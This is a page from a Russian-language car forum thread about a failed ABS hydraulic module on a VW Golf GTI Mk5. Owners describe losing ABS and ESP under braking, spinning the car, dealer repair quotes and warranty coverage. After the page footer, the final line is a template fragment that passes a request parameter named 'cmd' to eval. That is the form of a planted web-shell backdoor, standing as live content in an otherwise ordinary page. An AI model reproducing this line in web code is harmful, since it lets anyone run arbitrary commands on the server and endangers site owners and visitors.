+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 18

Тема: накрылся гидромодуль АБС на mkV gti


  1. #1

    накрылся гидромодуль АБС на mkV gti

    Товарищи , столкнулся вот с какой проблемой ... Неделю назад при вынужденном резком торможении отключилась вся электроника , отвечающая за АБС , ЕСП , АСР и тд. и машина полетела еще быстрее чем ехала ... в итоге развернуло меня на 180 градусов .... я был в а*уе .
    Короче , через вагком посмотрели у диллера , сказали накрылся или блок управления абс (18 тыс.руб.) или весь этот модуль (60 тыс руб.) .
    У кого-нибудь случалось такое ??? гарантия кончилась 3 месяца назад ..... (((((
    GTI 5 dsg blackkk

  2. #2
    У меня такая же проблема, при срабатывании антизаноса на панели загорается ABS, ESP и моргает ручник (кстати АБС при этом работает).
    В логах ошибка 01130 - ABS Operation: Implausible Signal .
    Дилер по куланцу такое сказал не чинят.
    Предложили менять блок в сборе я отказался и пока езжу так.
    А вообще буду менять электронику этого блока.

    Вот еще тему посмотри тык

  3. #3
    во во ! именно так у меня и происходит ! Нужно разобраться это электроника накрылась или гидравлика ....
    Просто при плавном нажатии на тормоз , более менее оттормазиться можно !
    GTI 5 dsg blackkk

  4. #4
    GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Регистрация
    07.05.2008
    Машина
    VW Golf GTI Mk5 DSG
    Сообщений
    3,440
    Ну начинать надо в любом случае с электронного блока.

    Вообще я склонен считать что при отказе АБС "немного" перераспределяются тормозные усилия и тормозят только задние колёса. Вот небольшой рассказик ))


    "Я немногословен, т.к. только что вернулся из Мячково и там у меня всё пошло наперекосяк. На прогреве при обычном прохождении поворота, не на пределе, а просто быстром, у меня запищал зумер и замигали есп/абс/ручник. Остановился в безопасном месте вне траектории, заглушил, завёл, зумер и есп пришли в норму, но после второго поворота всё повторилось... Опять остановился, перезапустил двигатель, снова в повороте повторилось... Ну, подумал я, поеду без стабилизации :|: Только я не учёл, что эта неисправность каким-то образом перераспределила тормозные усилия. В итоге в первый поворот я заезжал задом
    Произошло это примерно так: подлетаю к первому повороту, начинаю плавно нажимать на тормоз и... меня мгновенно развернуло на 360. Такое ощущение, что кто-то дёрнул ручник на скорости 140 км/ч. После того как я вернулся на трассу я не успокоился и решил ехать дальше, ведь надо время за клуб показать ))) Но ехал аккуратно, тормозя на 50 метров раньше (со 150), автомобиль при этом немного крестило, а в зеркале заднего вида появился дымок. В итоге я кое-как проехал 1 боевой круг, оооочень осторожный (2.04.5**) и решил ещё кружок навернуть. Перед третьим сектором после скоростной связки я снова чуть не потерял автомобиль и решил ехать в боксы. На вторую 10-ти минутную сессию я не поехал.
    Так же в результате разворота и дальнейшей блокировки задних колёс у меня они стёрлись, если точнее, то они оквадратились. А я его так бережно и равномерно стачивал на протяжении года... Теперь буду искать либо 2 покрышки ПС2 б/у, либо брать 4 новых Адван АД08. Пока думаю...".

    В общем хорошо что это всё случилось в Мячково, а не на обычной дороге. И конечно же блок надо менять. Неисправность в тормозной системе надо срочно исправлять.
    С уважением, Василий.

    My onboard video.

  5. #5
    " В итоге в первый поворот я заезжал задом
    Произошло это примерно так: подлетаю к первому повороту, начинаю плавно нажимать на тормоз и... меня мгновенно развернуло на 360. ...".

    у а меня это случилось на Профсоюзной на сколькой дороге , на убогой хакке Р и хвала японским небожителям эта была ночь .... я подъезжал к светофору и поздно начал оттормаживаться .... в итоге меня развернуло и на сфетофоре я оказался жопкой ... спина похолодела ..

    Мне кто-то сказал , что куланс распространяется на электронную часть (т.е. на сам блок ) 50 на 50
    GTI 5 dsg blackkk

  6. #6
    точно не утверждаю , но вроде гидромодули ремонто-пригодны

  7. #7
    GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Регистрация
    07.05.2008
    Машина
    VW Golf GTI Mk5 DSG
    Сообщений
    3,440
    Возможно, я не знаю...
    С уважением, Василий.

    My onboard video.

  8. #8
    zyzo4ka Я вместе с гарантийщиком в программе по кулансу лазил и этого блока там к сожалению нет :(

  9. #9
    нет гидромодуля в сборе !
    А электронная часть должна входить в куланс !
    GTI 5 dsg blackkk

  10. #10
    GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Регистрация
    07.05.2008
    Машина
    VW Golf GTI Mk5 DSG
    Сообщений
    3,440
    Цитата Сообщение от zyzo4ka Посмотреть сообщение
    А электронная часть должна входить в куланс !
    Почему?
    Даже не так, - где это четко прописано?
    С уважением, Василий.

    My onboard video.

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Ответов: 7
    Последнее сообщение: 02.07.2023, 23:57

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}